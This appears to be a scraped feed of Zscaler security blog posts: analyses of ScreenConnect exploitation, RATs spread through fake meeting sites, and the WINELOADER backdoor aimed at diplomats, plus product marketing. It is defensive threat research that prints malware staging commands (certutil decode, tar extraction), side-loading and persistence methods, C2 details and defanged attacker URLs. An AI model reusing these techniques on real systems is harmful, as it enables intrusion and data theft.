4. Malicious Code Execution: Following the successful upload of the malicious ScreenConnect extension (.ashx file), the vulnerable system executes the code contained within the payload as shown in Figure 7. This execution grants the attacker unauthorized access and control over the compromised system, enabling further exploitation and privilege escalation.
Figure 7: The malicious ZIP archive uploaded by the attacker containing a Base64-encoded command invoking cmd.exe for remote code execution.
According to reports, the post-exploitation phase included the deployment of ToddlerShark malware, leveraging the second vulnerability. ToddlerShark malware demonstrates polymorphic behavior and utilizes legitimate Microsoft binaries and alternate data streams. It bears a striking resemblance to BabyShark malware, which has been associated with the North Korean APT group known as Kimsuky.
Zscaler Best PracticesSafeguard crown jewel applications by limiting lateral movement using Zscaler Private Access™ with advanced Deception turned on.
Route all server traffic through Zscaler Private Access™ with the application security module enabled and Zscaler Internet Access™, which provides visibility to identify and stop malicious activity from compromised systems/servers.
Turn on Zscaler Advanced Threat Protection™ to block all known command-and-control (C2) domains — thereby adding another layer of protection if an attacker exploits this vulnerability to implant malware.
Extend command-and-control (C2) protection to all ports and protocols with Zscaler Cloud Firewall™ (Cloud IPS module), including emerging C2 destinations. Doing so provides additional protection if the attacker exploits this vulnerability to implant malware.
Use Zscaler Cloud Sandbox™ to prevent unknown malware delivered as art of a second-stage payload.
Inspect all TLS/SSL traffic and restrict traffic to critical infrastructure from an allowed list of known-good destinations.
ConclusionTo ensure security, ConnectWise ScreenConnect users should update their on-prem deployments to version 23.9.8 or above promptly. Cloud-based deployments, on the other hand, do not require any action as ConnectWise has already applied the necessary patches. Failing to update exposes systems to vulnerabilities such as CVE-2024-1709 and CVE-2024-1708. These vulnerabilities enable threat actors to manipulate server configurations, gain administrator-level privileges, and execute remote code.
Indicators of CompromiseConnectWise reported active exploitation of CVE-2024-1709 and released the following Indicators of Compromise (IOCs):
155[.]133[.]5[.]15
155[.]133[.]5[.]14
118[.]69[.]65[.]60
Zscaler CoverageThe Zscaler ThreatLabz team has deployed the following:
Zscaler Advanced Threat Protection
APP.EXPLOIT.CVE-2024-1708_CVE-2024-1709
Zscaler Private Access AppProtection
6000760 - ConnectWise ScreenConnect SetupModule Authentication Bypass (CVE-2024-1709)
For more details, visit the Zscaler Threat Library.
Referencesconnectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
Understanding the ConnectWise ScreenConnect CVE-2024-1709 & CVE-2024-1708 | Huntress Blog
https://www.bleepingcomputer.com/news/security/connectwise-urges-screenconnect-admins-to-patch-critical-rce-flaw/
Detection Guidance for ConnectWise CWE-288 (huntress.com)
https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE
Mon, 11 3月 2024 14:30:19 -0700Arkaprava Tripathihttps://www.zscaler.jp/blogs/security-research/multiple-vulnerabilities-found-connectwise-screenconnectLinkedIn Outage Detected by Zscaler Digital Experience (ZDX)
https://www.zscaler.jp/blogs/product-insights/linkedin-outage-detected-zscaler-digital-experience-zdx
At 3:40 p.m. EST on March 6, 2024, Zscaler Digital Experience (ZDX) saw a substantial, unexpected drop in the ZDX score for LinkedIn services around the globe. Upon analysis, we noticed HTTP 503 errors highlighting a LinkedIn outage, with the ZDX heatmap clearly detailing the impact at a global scale.
ZDX dashboard indicating widespread LinkedIn outage
ZDX enables customers to proactively identify and quickly isolate service issues, giving IT teams confidence in the root cause, reducing mean time to resolve (MTTR) and first response time (MTTD).
ZDX dashboard showing LinkedIn global issues
ZDX Score highlights LinkedIn outageVisible on the ZDX admin portal dashboard, the ZDX Score represents all users in an organization across all applications, locations, and cities on a scale of 0 to 100, with the low end indicating a poor user experience. Depending on the time period and filters selected in the dashboard, the score will adjust accordingly.
The dashboard shows that the ZDX Score for the LinkedIn probes dropped to ZERO during the outage window of approximately 1 hour. From within ZDX, service desk teams can easily see that the service degradation isn’t limited to a single location or user and quickly begin analyzing the root cause.
ZDX Score indicating LinkedIn outage and recovery (times in EST)
Also in the ZDX dashboard, “Web Probe Metrics” highlight the user impact of reaching LinkedIn applications across a timeline with response times. In this case, the server responded with 503 errors, indicating the server was not ready to handle requests.
ZDX Web Probe Metrics indicating 503 errors (times in EST)
ZDX can quickly identify the root cause of user experience issues with its new AI-powered root cause analysis capability. This spares IT teams the labor of sifting through fragmented data and troubleshooting, thereby accelerating resolution and keeping employees productive.
With a simple click in the ZDX dashboard, you can analyze a score, and ZDX will provide insight into potential issues. As you can see, in the case of this LinkedIn outage, ZDX highlights that the application is impacted while the network itself is fine.
ZDX AI-powered root cause analysis indicates the reason for the outage
When there’s an application outage, many IT teams turn to the network as the root cause. However, as you can see above, ZDX AI-powered root cause analysis verified that the network transport wasn’t the issue; it was actually at the application level. You can verify this by looking at the CloudPath metrics from the user to the destination.
ZDX CloudPath showing full end-to-end data path
ZDX CloudPath detailed hops between the nodes
With AI-powered analysis and dynamic alerts, IT teams can quickly compare optimal vs. degraded user experiences and set intelligent alerts based on deviations in observed metrics. ZDX allows you to compare two points in time to understand the differences between them. This function determines a good vs. poor user experience, visually highlighting the differences between application, network, and device metrics.
The end user comparison during the LinkedIn outage vs. a known good score indicates the ZDX Score difference, highlighting the unexpected performance drop for the end user.
ZDX comparison mode identifies the change in user experience
According to the LinkedIn status page, the outage was reported at 12:50 PST until 14:05 PST, which correlates to the ZDX data above. However, LinkedIn services started to recover pretty quickly, by 13:40 PST, and LinkedIn reported the issue resolved by 14:05 PST.
Source: LinkedIn
With ZDX alerting, our customers were proactively notified about end user problems, and incidents were opened automatically with our service desk integration (e.g., ServiceNow) long before users started to report it. From a single dashboard, customers were able to quickly identify this as a LinkedIn issue, not an internal network outage, saving precious IT time.
Zscaler Digital Experience successfully detected a LinkedIn outage along with its root cause, giving our customers the confidence that it was not a single location, their networks, or devices, averting critical impact to their business.
Try Zscaler Digital Experience today
ZDX helps IT teams monitor digital experiences from the end user perspective to optimize performance and rapidly fix offending application, network, and device issues. To see how ZDX can help your organization, please contact us.
Thu, 07 3月 2024 19:14:07 -0800Rohit Goyalhttps://www.zscaler.jp/blogs/product-insights/linkedin-outage-detected-zscaler-digital-experience-zdxAndroid and Windows RATs Distributed Via Online Meeting Lures
https://www.zscaler.jp/blogs/security-research/android-and-windows-rats-distributed-online-meeting-lures
IntroductionBeginning in December 2023, Zscaler’s ThreatLabz discovered a threat actor creating fraudulent Skype, Google Meet, and Zoom websites to spread malware. The threat actor spreads SpyNote RAT to Android users and NjRAT and DCRat to Windows users. This article describes and shows how the threat actor’s malicious URLs and files can be identified on these fraudulent online meeting websites.
Key Takeaways
A threat actor is distributing multiple malware families using fake Skype, Zoom, and Google Meet websites.
The threat actor is distributing Remote Access Trojans (RATs) including SpyNote RAT for Android platforms, and NjRAT and DCRat for Windows systems.
Campaign OverviewThe attacker utilized shared web hosting, hosting all these fake online meeting sites on a single IP address. All of the fake sites were in Russian as shown in all the figures below. In addition, the attackers hosted these fake sites using URLs that closely resembled the actual websites.
Attack SequenceThe diagram below illustrates how the malware was distributed and executed on the victim's machine during the campaign:
Figure 1: Attack chain and execution flow for Android and Windows campaigns.
When a user visits one of the fake sites, clicking on the Android button initiates the download of a malicious APK file, while clicking on the Windows button triggers the download of a BAT file. The BAT file when executed performs additional actions, ultimately leading to the download of a RAT payload.
SkypeDuring our investigation, we discovered that the first fake site, join-skype[.]info, was created in early December to deceive users into downloading a fake Skype application as shown in Figure 2.
Figure 2: The fraudulent Skype website, with a fake domain meant to resemble the legitimate Skype domain. (Image courtesy of urlscan.io.)
The Windows button pointed to a file named Skype8.exe and the Google Play button pointed at Skype.apk (neither of these files was available at the time of analysis). The Apple App Store button redirected to https://go.skype.com/skype.download.for.phone.iphone, indicating that the threat actor was not targeting iOS users with malware.
Google MeetIn late December, the attacker created another fake site, online-cloudmeeting[.]pro, mimicking Google Meet as shown in Figure 3. The fake Google Meet site was hosted on online-cloudmeeting[.]pro/gry-ucdu-fhc/ where the subpath gry-ucdu-fhc was deliberately created to resemble a Google Meet joining link. Genuine Google Meet invite codes typically follow the structure [a-z]{3}-[a-z]{4}-[a-z]{3}.
The fake site provides links to download a fake Skype application for Android and/or Windows. The Windows link leads to a BAT file named updateZoom20243001bit.bat, which in turn downloads the final payload named ZoomDirectUpdate.exe. This final payload is a WinRAR archive file that contains DCRat, packed with Eziriz .NET Reactor.
Figure 3: The fake Google Meet page, showing the fraudulent domain in the address bar for a fake Google Meet Windows application link to a malicious BAT file that downloads and executes malware.
The Android link in this figure led to a SpyNote RAT APK file named meet.apk.
ZoomIn late January, we observed the emergence of a fake Zoom site (shown in Figure 4), us06webzoomus[.]pro. The fake Zoom site, hosted at the URL us06webzoomus[.]pro/l/62202342233720Yzhkb3dHQXczZG1XS1Z3Sk9kenpkZz09/, features a subpath that closely resembles a meeting ID generated by the Zoom client. If a user clicks the Google Play link, a file named Zoom02.apk will be downloaded containing the SpyNote RAT. Similar to the fake Google Meet site, when a user clicks the Windows button it downloads a BAT file, which in turn downloads a DCRat payload.
Figure 4: The fake Zoom page, showing a domain similar to the real Zoom domain in the address bar and a link to the malicious APK file that contains SpyNote RAT when the Google Play button is clicked.
Open DirectoriesIn addition to hosting DCRat, the fake Google Meet and Zoom websites also contain an open directory (shown in Figure 5) with two additional Windows executable files named driver.exe and meet.exe (inside the archive gry-ucdu-fhc.zip), which are NjRAT. The presence of these files suggests that the attacker may utilize them in other campaigns, given their distinct names.
Figure 5: Example of additional malicious files hosted on the websites hosting fake online meeting applications.
ConclusionOur research demonstrates that businesses may be subject to threats that impersonate online meeting applications. In this example, a threat actor is using these lures to distribute RATs for Android and Windows, which can steal confidential information, log keystrokes, and steal files. Our findings highlight the need for robust security measures to protect against advanced and evolving malware threats and the importance of regular updates and security patches.
As cyber threats continue to evolve and become increasingly complex, it is critical to remain alert and take proactive measures to protect against them. Zscaler's ThreatLabz team is dedicated to staying on top of these threats and sharing our findings with the wider community.
Zscaler Sandbox CoverageDuring our investigation of this campaign, the Zscaler sandbox played a vital role in analyzing the behavior of different files. The sandbox analysis allowed us to identify threat scores and pinpoint specific MITRE ATT&CK techniques that were triggered during the analysis process.
Figure 6: DCRat Zscaler sandbox report
Figure 7: NjRAT Zscaler sandbox report
Zscaler’s multilayered cloud security platform detected payloads with the following threat names:
Win32.Backdoor.DCRat
Win32.Backdoor.NjRat
MITRE ATT&CK TechniquesEnterprise MatrixTACTIC
TECHNIQUE ID
TECHNIQUE NAME
Execution
T1064
T1059.001
Scripting
PowerShell
Persistence
T1547.001
Registry Run Keys / Startup Folder
Privilege Escalation
T1547
Boot or Logon Autostart Execution
Defense Evasion
T1140
T1064
T1027
T1027.002
T1070.004
T1036
Deobfuscate/Decode Files or Information
Scripting
Obfuscated Files or Information
Software Packing
File Deletion
Masquerading
Credential Access
T1056
T1555
Input Capture
Credentials from Password Stores
Discovery
T1124
T1083
T1082
T1518.001
T1057
T1010
T1018
T1016
T1120
System Time Discovery
File and Directory Discovery
System Information Discovery
Security Software Discovery
Process Discovery
Application Window Discovery
Remote System Discovery
System Network Configuration Discovery
Peripheral Device Discovery
Collection
T1123
T1115
T1056
T1113
T1125
Audio Capture
Clipboard Data
Input Capture
Screen Capture
Video Capture
Command and Control
T1219
T1573
T1571
T1095
T1071
Remote Access Software
Encrypted Channel
Non-Standard Port
Non-Application Layer Protocol
Application Layer Protocol
Impact
T1498
T1529
Network Denial of Service
System Shutdown/Reboot
Mobile MatrixTACTIC
TECHNIQUE ID
TECHNIQUE NAME
Persistence
T1624
T1444
Event Triggered Execution: Broadcast Receivers
Masquerade as Legitimate Application
Privilege Escalation, Persistence
T1626
T1546
Abuse Elevation Control Mechanism Event Triggered Execution
Collection
T1533 T1429 T1430 T1636
Data from Local System
Audio Capture
Location Tracking
Contact and SMS data
Tue, 05 3月 2024 08:30:01 -0800Himanshu Sharmahttps://www.zscaler.jp/blogs/security-research/android-and-windows-rats-distributed-online-meeting-luresEuropean diplomats targeted by SPIKEDWINE with WINELOADER
https://www.zscaler.jp/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader
IntroductionZscaler's ThreatLabz discovered a suspicious PDF file uploaded to VirusTotal from Latvia on January 30th, 2024. This PDF file is masqueraded as an invitation letter from the Ambassador of India, inviting diplomats to a wine-tasting event in February 2024. The PDF also included a link to a fake questionnaire that redirects users to a malicious ZIP archive hosted on a compromised site, initiating the infection chain. Further threat hunting led us to the discovery of another similar PDF file uploaded to VirusTotal from Latvia in July 2023.This blog provides detailed information about a previously undocumented backdoor we named ‘WINELOADER'. We believe that a nation-state threat actor, interested in exploiting the geopolitical relations between India and diplomats in European nations, carried out this attack. The attack is characterized by its very low volume and the advanced tactics, techniques, and procedures (TTPs) employed in the malware and command and control (C2) infrastructure. While we have not yet attributed this attack to any known APT group, we have named this threat actor SPIKEDWINE based on the wine-related theme and filenames used in different stages of the attack chain, and our investigation into the case is ongoing.Key Takeaways
Low-volume targeted attack: The samples intentionally targeted officials from countries with Indian diplomatic missions, although VirusTotal submissions indicate a specific focus on European diplomats.
New modular backdoor: WINELOADER has a modular design, with encrypted modules downloaded from the command and control (C2) server.
Evasive tactics: The backdoor employs techniques, including re-encryption and zeroing out memory buffers, to guard sensitive data in memory and evade memory forensics solutions.
Compromised infrastructure: The threat actor utilized compromised websites at multiple stages of the attack chain.
Attack Chain
Figure 1 below illustrates the multi-stage attack chain at a high level.
Figure 1: Multi-stage attack chain of WINELOADER.
Technical Analysis
In this section, we provide a detailed analysis of each component of the attack chain initiated when a victim receives and clicks on the link within the PDF.
PDF analysis
The PDF file is a fake invitation to a wine-tasting event purported to take place at the Indian ambassador’s residence on February 2nd, 2024. The contents are well-crafted to impersonate the Ambassador of India. The invitation contains a link to a fake questionnaire, which kickstarts the infection chain.
The malicious link in the PDF invitation redirects users to a compromised site, hxxps://seeceafcleaners[.]co[.]uk/wine.php, that proceeds to download a ZIP archive containing an HTA file - wine.hta.
Figure 2 below shows the contents of the PDF file.
Figure 2: The PDF invitation showcasing the malicious link.
A quick analysis of the PDF file's metadata reveals that it was generated using LibreOffice version 6.4, and the time of creation was January 29th, 2024, at 10:38 AM UTC.
HTA file analysis
The HTA file downloaded in the previous section contains obfuscated JavaScript code, which executes the next stage of malicious activities. The obfuscation technique used in the code exhibits patterns that match those of the publicly available obfuscator obfuscator.io.
Figure 3 below shows a preview of the code inside the HTA file. Decoy content is displayed to the victim to disguise malicious activity. This content is similar to what was displayed in the original PDF (Figure 2 above) and includes information about the wine-tasting event in February 2024.
Figure 3: Obfuscated JavaScript code inside the HTA file.
The HTA file performs the following key functions:
Downloads a Base64 encoded text file from the URL: seeceafcleaners[.]co[.]uk/cert.php
Saves the text file to the path: C:\Windows\Tasks\text.txt
Uses certutil.exe to Base64 decode the text file and write the result to a ZIP archive with the path: C:\Windows\Tasks\text.zip. The command used is: certutil -decode C:\Windows\Tasks\text.txt C:\Windows\\Tasks\text.zip
Extracts the contents of the ZIP archive to the path: C:\Windows\Tasks\. The command used is: tar -xf C:\Windows\Tasks\text.zip -C C:\Windows\Tasks\. The ZIP archive contains two files named sqlwriter.exe and vcruntime140.dll. Here, sqlwriter.exe is the legitimate binary signed by Microsoft and vcruntime140.dll is the malicious DLL crafted by the attacker which will be side-loaded automatically when sqlwriter.exe is executed. Per our research, sqlwriter.exe has never been abused in-the-wild by any threat actor for DLL side-loading (at least to the best of our knowledge). This implies that the threat actor in this case put in extra effort to identify a signed Microsoft executable vulnerable to DLL side-loading.
Executes sqlwriter.exe from the path: C:\Windows\Tasks\ which will kick start the infection chain.
WINELOADER binary analysis
When executing sqlwriter.exe, it loads a malicious DLL named vcruntime140.dll from the same directory using DLL side-loading. The exported function set_se_translator is then executed. This function decrypts the embedded WINELOADER core module within the DLL using a hardcoded 256-byte RC4 key before executing it. This is shown in the screenshot below.
Figure 4: Code section that decrypts and executes the WINELOADER core module.
Each module consists of configuration data (e.g., C2 polling interval), an RC4 key, and encrypted strings, followed by the module code. Part of the decrypted WINELOADER core module is shown in Figure 5 below.
Figure 5: Data structure containing relevant configuration, RC4 key, encrypted strings, and the module.
WINELOADER employs the following techniques to evade detection:
Sensitive data is encrypted with a hardcoded 256-byte RC4 key. The sensitive data includes:
The core module and subsequent modules downloaded from the C2 server
Strings (e.g. DLL filenames and API import function names)
Data sent and received from the C2 server
Some strings are decrypted on use and re-encrypted shortly after.
Memory buffers for storing results from API calls or decrypted strings are zeroed after use.
DLL hollowing is then used to inject WINELOADER into a randomly selected DLL from the Windows system directory. The implementation is similar to the one presented by SECFORCE in their blog. WINELOADER includes additional randomization code to ensure that different DLLs are chosen for each instance of DLL hollowing (see Figure 6).
Figure 6: The randomization code used when selecting a Windows system DLL for DLL hollowing.
WINELOADER is not injected into the following DLLs as they contain exported functions used by the malware:
advapi32.dll
api-ms-win-crt-math-l1-1-0.dll
api-ms-win-crt-stdio-l1-1-0.dll
bcryptprimitives.dll
iphlpapi.dll
kernel32.dll
kernelbase.dll
mscoree.dll
ntdll.dll
ole32.dll
rpcrt4.dll
shlwapi.dll
user32.dll
wininet.dll
WINELOADER will inject itself into another randomly selected DLL again via DLL hollowing before it sends the first beacon request to the C2 server.
The beacon request is an HTTP GET request containing a request body, which is unusual for GET requests. All requests to the C2 server use the same User-Agent, Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.1) Gecko/20100101 Firefox/86.1, hardcoded into the sample itself.
The body of the HTTP GET request is encrypted with the same 256-byte RC4 key and the fields are as follows. We have appended a question mark to fields that we are unable to conclusively verify due to the limited data collected. This information in available in the table below.
Offset
Length
Name
Description
0x0
2
Length of padding bytes (n)
This value is randomized (min: 255, max: 65535), stored in little-endian (LE).
0x2
n
Padding bytes
Padding bytes are randomly generated with the ProcessPrng API.
0x2 + n
8
Campaign ID?
5F D5 97 93 ED 26 CB 5A in the analyzed sample.
0xa + n
8
Session ID?
Randomly generated on execution.
0x12 + n
8
Local IP address
The local IP address of the infected machine.
0x20 + n
512
Parent process name
In Unicode
0x220 + n
512
User name
In Unicode
0x420 + n
30
Machine name
In Unicode
0x43e + n
4
Parent process ID
In little-endian
0x442 + n
1
Parent process token elevation type
Information about the privileges of the token linked to the parent process.
0x443 + n
8
Polling interval for C2 requests
C0 d4 01 00 00 00 00 00 in the analyzed sample, translates to 120,000 ms or 2 mins between requests.
0x44b + n
1
Request type?
1 for beacon, 2 for status update
0x44c + n
8
Length of message
In little-endian. 0 for beacon requests
0x454 + n
8
Unknown?
Observed to match the value of the request type field.
0x45c + n
8
Module ID?
00 00 00 00 00 00 00 for the core module and 6B 19 A8 D2 69 2E 85 64 for the persistence module.
0x464 + n
Varies
Message
Only observed for type 2 requests.
Table 1: WINELOADER C2 beacon request fields
An example beacon request is shown below. The value of the Content-Length header varies across requests, as the padding length is randomized with a minimum of 1,381 bytes.
The same RC4 key is then used to decrypt the response from the C2 server. The fields for the decrypted response are shown in the table below.
Offset
Length
Name
Description
0x0
2
Length of padding bytes (n)
This value is stored in little-endian (LE).
0x2
n
Padding bytes
Unused bytes
0x2 + n
8
Campaign ID?
5F D5 97 93 ED 26 CB 5A in the analyzed sample
0xa + n
1
Command
Command from C2
0xb + n
Varies
Command data
Binary data for command
Table 2: WINELOADER C2 response fields
The core module supports three commands:
Execute modules from the C2 either synchronously or asynchronously (via CreateThread)
Inject itself into another DLL
Update the sleep interval between beacon requests
During our research, we obtained a persistence module from the C2 server. This module copies sqlwriter.exe and vcruntime.dll into the C:\Windows\Tasks directory and creates a scheduled task named MS SQL Writer with the description SQL Server VSS Writer 64-bit to execute C:\Windows\Tasks\sqlwriter.exe daily.
The persistence module offers an alternative configuration to establish registry persistence at HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MS SQL Writer.
After establishing persistence for WINELOADER, the module sends an HTTP POST request to notify the C2 server about the completed task. The request body mirrors the structure of the beacon request.
Command And Control Infrastructure
The threat actor leveraged compromised network infrastructure at all stages of the attack chain. We identified three compromised websites used for hosting intermediate payloads or as C2 servers.
Based on our in-depth analysis of the C2 communication, we believe the C2 server only responds to specific types of requests at certain times. This measure prevents automated analysis solutions from retrieving C2 responses and modular payloads.
Conclusion
The threat discussed in this blog demonstrated advanced tactics, techniques, and procedures (TTPs), displaying a keen interest in exploiting the diplomatic relations between India and Europe. The threat actor put additional effort into remaining undetected by evading memory forensics and automated URL scanning solutions.
While we cannot currently attribute this activity to any known nation-state threat actor, we continue to monitor any new developments associated with this threat actor and ensure the necessary protections for our customers against these threats.
Zscaler Coverage
Figure 7: Zscaler sandbox detection report
In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to WINELOADER at various levels with the following threat names:
Win64.Downloader.WineLoader
Indicators Of Compromise (IOCs)
SHA256
Description
72b92683052e0c813890caf7b4f8bfd331a8b2afc324dd545d46138f677178c4
vcruntime140.dll (WINELOADER core module loader)
ad43bbb21e2524a71bad5312a7b74af223090a8375f586d65ff239410bbd81a7
wine.pdf (July 2023 invitation)
3739b2eae11c8367b576869b68d502b97676fb68d18cc0045f661fbe354afcb9
wine.pdf (Feb 2024 invitation)
1c7593078f69f642b3442dc558cddff4347334ed7c96cd096367afd08dca67bc
wine.hta
e477f52a5f67830d81cf417434991fe088bfec21984514a5ee22c1bcffe1f2bc
WINELOADER core module
f61cee951b7024fca048175ca0606bfd550437f5ba2824c50d10bef8fb54ca45
WINELOADER core module (RC4-encrypted)
c1223aa67a72e6c4a9a61bf3733b68bfbe08add41b73ad133a7c640ba265a19e
WINELOADER persistence module loader
b014cdff3ac877bdd329ca0c02bdd604817e7af36ad82f912132c50355af0920
WINELOADER persistence module
7600d4bb4e159b38408cb4f3a4fa19a5526eec0051c8c508ef1045f75b0f6083
WINELOADER persistence module (RC4-encrypted)
URL
Description
hxxps://castechtools[.]com/api.php
WINELOADER C2
hxxps://seeceafcleaners[.]co[.]uk/cert.php
Downloads base64-encoded ZIP archive from this URL.
hxxps://seeceafcleaners[.]co[.]uk/wine.php
Downloads the ZIP archive containing the wine.hta file.
hxxps://passatempobasico[.]com[.]br/wine.php
Downloads the ZIP archive containing the wine.hta file (IOC from July 2023).
MITRE ATT&CK Framework
ID
Tactic
Description
T1204.002
User Execution: Malicious File
The PDF file that masquerades as an invitation contains a malicious link.
T1656
Impersonation
The contents of the PDF are crafted to impersonate the Ambassador of India.
T1204.001
User Execution: Malicious Link
The PDF file contains a link that leads to the download of a malicious ZIP archive.
T1574.002
Hijack Execution Flow: DLL Side-Loading
sqlwriter.exe is used to DLL side-load vcruntime140.dll.
T1055.001
Process Injection: Dynamic-link Library Injection
DLL hollowing is used to load a randomly chosen system DLL into sqlwriter.exe process memory and inject WINELOADER in that DLL.
T1573.001
Encrypted Channel: Symmetric Cryptography
RC4 stream cipher is used to encrypt the data exchanged between WINELOADER and the C2 server.
T1041
Exfiltration Over C2 Channel
Data is encrypted and exfiltrated to the C2 server.
T1584
Compromise Infrastructure
Compromised sites are used for hosting payloads and as a C2 server.
T1053.005
Scheduled Task/Job: Scheduled Task
A scheduled task with the name “MS SQL Writer” is created to ensure sqlwriter.exe is executed to kick-start the infection chain.
T1547.001
Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder
WINELOADER can be configured to execute on Windows startup by setting the registry key at HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MS SQL Writer.
T1140
Deobfuscate/Decode Files or Information
WINELOADER strings and modules are encrypted with RC4. Sensitive data is often re-encrypted or zeroed out after use.
T1036.001
Masquerading: Invalid Code Signature
vcruntime140.dll has an invalid Microsoft code signing certificate.
T1036.004
Masquerading: Masquerade Task or Service
The scheduled task created for persistence masquerades as a legitimate Microsoft scheduled task.
T1027.007
Obfuscated Files or Information: Dynamic API Resolution
API names are decrypted before they are dynamically resolved and called.
T1027.009
Obfuscated Files or Information: Embedded Payloads
WINELOADER modules are encrypted with RC4 within vcruntime140.dll and C2 responses.
T1218.005
System Binary Proxy Execution: Mshta
mshta.exe executes wine.hta, which contains malicious JS downloader code.
T1033
System Owner/User Discovery
WINELOADER sends the current user and system name in each C2 request.
T1071.001
Application Layer Protocol: Web Protocols
WINELOADER communicates with its C2 via HTTPS. HTTP GET requests contain a request body that is atypical of such requests.
T1001.001
Data Obfuscation: Junk Data
WINELOADER prepends a randomized number of junk bytes to the request data before encrypting and sending it to the C2.
Appendix
Below is the full 256-byte RC4 key embedded inside WINELOADER that is used to encrypt and decrypt the information exchanged between the malware and the C2 server.
Tue, 27 2月 2024 09:32:38 -0800Sudeep Singhhttps://www.zscaler.jp/blogs/security-research/european-diplomats-targeted-spikedwine-wineloaderWhy Haven’t Firewalls and VPNs Stopped More Organizations from Being Breached?
https://www.zscaler.jp/blogs/product-insights/why-havent-firewalls-and-vpns-stopped-more-organizations-being-breached
Reducing cyber risk is an increasingly important initiative for organizations today. Due to the fact that a single cyber breach can be financially fatal as well as disastrous for countless stakeholders, improving cybersecurity has become a board-level concern and drawn increased attention from regulatory bodies around the globe. As a result, organizations everywhere have poured massive amounts of time and money into security technologies that are supposed to protect them from cybercriminals’ malicious ends. Specifically, the go-to tools that are deployed in an effort to enhance security are firewalls and VPNs.
Despite the above, breaches continue to occur (and increase in number) at an alarming rate every year. News headlines about particularly noteworthy breaches serve as continual reminders that improperly mitigating risk can be catastrophic, and that the standard tools for ensuring security are insufficient. One needs not look far for concrete examples—the security debacles at Maersk and Colonial Pipeline are powerful, salient illustrations of what can go wrong.
With more and more organizations falling prey to our risk-riddled reality, an obvious question arises: Why haven’t firewalls and VPNs stopped more organizations from being breached?
The weaknesses of perimeter-based architectures
Firewalls and VPNs were designed for an era gone by; when users, apps, and data resided on premises; when remote work was the exception; when the cloud had not yet materialized. And in this age of yesteryear, their primary focus was on establishing a safe perimeter around the network in order to keep the bad things out and the good things in. Even for organizations with massive hub-and-spoke networks connecting various locations like branch sites, the standard methods of trying to achieve threat protection and data protection still inevitably involved securing the network as a whole. This architectural approach goes by multiple names, including perimeter-based, castle-and-moat, network-centric, and more.
In other words, firewalls, VPNs, and the architecture that they presuppose are intended for an on-premises-only world that no longer exists. The cloud and remote work have changed things forever. With users, apps, and data all leaving the building en masse, the network perimeter has effectively inverted, meaning more activity now takes place outside the perimeter than within it. And when organizations undergoing digital transformation try to cling to the traditional way of doing security, it creates a variety of challenges. These problems include greater complexity, administrative burden, and cost, as well as decreased productivity and—of primary importance for our topic in this blog post—increased risk.
How do firewalls and VPNs increase risk?
There are four key ways that legacy tools like firewalls and VPNs increase the risk of breaches and their numerous, harmful side effects. Whether they are hardware appliances or virtual appliances makes little difference.
They expand the attack surface. Deploying tools like firewalls and VPNs is supposed to protect the ever-growing network as it is extended to more locations, clouds, users, and devices. However, these tools have public IP addresses that can be found on the internet. This is by design so that the intended users can access the network via the web and do their jobs, but it also means that cybercriminals can find these entry points into the network and target them. As more of these tools are deployed, the attack surface is continually expanded, and the problem is worsened.
They enable compromise. Organizations need to inspect all traffic and enforce real-time security policies if they are to stop compromise. But about 95% of traffic today is encrypted, and inspecting such traffic requires extensive compute power. Appliances have static capacities to handle a fixed volume of traffic and, consequently, struggle to scale as needed to inspect encrypted traffic as organizations grow. This means threats are able to pass through defenses via encrypted traffic and compromise organizations.
They allow lateral threat movement. Firewalls and VPNs are what primarily compose the “moat” in a castle-and-moat security model. They are focused on establishing a network perimeter, as mentioned above. Relying on this strategy, however, means that there is little protection once a threat actor gets into the “castle,” i.e., the network. As a result, following compromise, attackers can move laterally across the network, from app to app, and do extensive damage.
They fail to stop data loss. Once cybercriminals have scoured connected resources on the network for sensitive information, they steal it. This typically occurs via encrypted traffic to the internet, which, as explained above, legacy tools struggle to inspect and secure. Similarly, modern data leakage paths, such as sharing functionality inside of SaaS applications like Box, cannot be secured with tools designed for a time when SaaS apps did not exist.
Why zero trust can stop organizations from being breached
Zero trust is the solution to the above problems. It is a modern architecture that takes an inherently different approach to security in light of the fact that the cloud and remote work have changed things forever, as described earlier. In other words, zero trust leaves the weaknesses of perimeter-based, network-centric, firewall-and-VPN architectures in the past. With an inline, global security cloud serving as an intelligent switchboard to provide zero trust connectivity (along with a plethora of other functionality), organizations can:
Minimize the attack surface: Hide applications behind a zero trust cloud, eliminate security tools with public IP addresses, and prevent inbound connections
Stop compromise: Leverage a high performance cloud to inspect all traffic at scale, including encrypted traffic, and enforce real-time policies to stop threats
Prevent lateral movement: Connect users, devices, and workloads directly to apps they are authorized to access instead of connecting them to the network as a whole
Block data loss: Prevent malicious data exfiltration and accidental data loss across all data leakage paths, including encrypted traffic, cloud apps, and endpoints
In addition to reducing risk, zero trust architecture solves problems related to complexity, cost, productivity, and more.
If you would like to learn more about zero trust, join our upcoming webinar, “Start Here: An Introduction to Zero Trust.”
Or, if you would like to dive deeper on the weaknesses of yesterday’s tools, read our new ebook, “4 Reasons Firewalls and VPNs Are Exposing Organizations to Breaches.”
Tue, 27 2月 2024 08:04:02 -0800Jacob Serpahttps://www.zscaler.jp/blogs/product-insights/why-havent-firewalls-and-vpns-stopped-more-organizations-being-breachedThe old social engineering playbook – Now with AI!
https://www.zscaler.jp/blogs/company-news/the-old-social-engineering-playbook-now-with-ai
When you’ve been in the security world long enough, you start to see old playbooks being reused, with new technology. Case in point: ‘Deepfake’ has been an increasingly common phrase in the news, describing digitally manipulated video being used to misrepresent a person or falsify identity. The latest example of deepfake targeting, where a successful video call resulted in a 25 million USD money transfer, captured people’s attention for a number of reasons. The main news value was in the enormous amount of money that the attackers were able to steal by faking a single video call. In itself, the technical playbook used to trick the person was nothing new. However, this deepfake example demonstrated once again just how high a level of sophistication is possible when AI is orchestrated creatively. People generally fear a relatively new technology, like AI, because they can’t immediately grasp its full potential and they have a fear of the unknown. Similarly, technological advancements also scare people when they feel like they pose a threat to their sense of security or working lives, such as losing their jobs to AI.
